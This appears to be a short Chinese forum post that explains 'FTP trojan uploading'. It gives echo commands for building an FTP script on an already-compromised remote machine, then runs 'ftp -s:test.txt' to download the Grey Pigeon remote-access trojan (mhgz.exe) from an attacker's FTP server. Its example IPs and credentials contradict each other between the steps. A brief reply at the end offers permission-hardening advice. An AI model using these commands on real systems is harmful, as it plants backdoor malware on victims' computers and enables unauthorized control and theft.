什么是FTP传马

是一种ftp传马命令。

在远程计算机的C***环境下，如果不能通过IPC$渠道传送文件，那就只有通过FTP下载文件了。

假设我们已经有一个FTP服务器，上面有一个我们配置好的灰鸽子木马文件mhgz.exe,我们应该知道FTP服务器的三个参数：

1、FTP服务器的IP地址：如1.1.1.1

2、FTP服务器的用户名：如test

3、FTP服务器的密 码：如test123

在远程计算机的C***下依次输入下面的命令：

1、echo open 221.202.50.125>>test.txt 登陆FTP服务器

2、echo 123>>test.txt 用户名

3、echo 123>>test.txt 密码

4、echo bin>>test.txt 开始

5、echo get mhgz.exe>>test.txt 下载灰鸽子木马

6、echo bye>>test.txt 关闭FTP服务器

输入上面命令后，在远程计算机上就会生成一个test.txt文件，内容为：

open 1.1.1.1

test

test123

bin

get mhgz.exe

bye

现在我们在远程计算机上执行下面的命令：

ftp -s:test.txt 意思是，读取test.txt里的参数，执行ftp命令，命令执行完后，灰鸽子木马文件mhgz.exe就下载到对方计算机里了。

晕，就算你你服务器无懈可击，如果你服务器上运行的网站脚本存在漏洞，一样可以传马的呀，你可以在除了提供web服务的文件夹外，全部设置成不具有写的权限，c：windows/system32这个目录最好设置成具有只读权限。

你的不会是个人电脑把？

---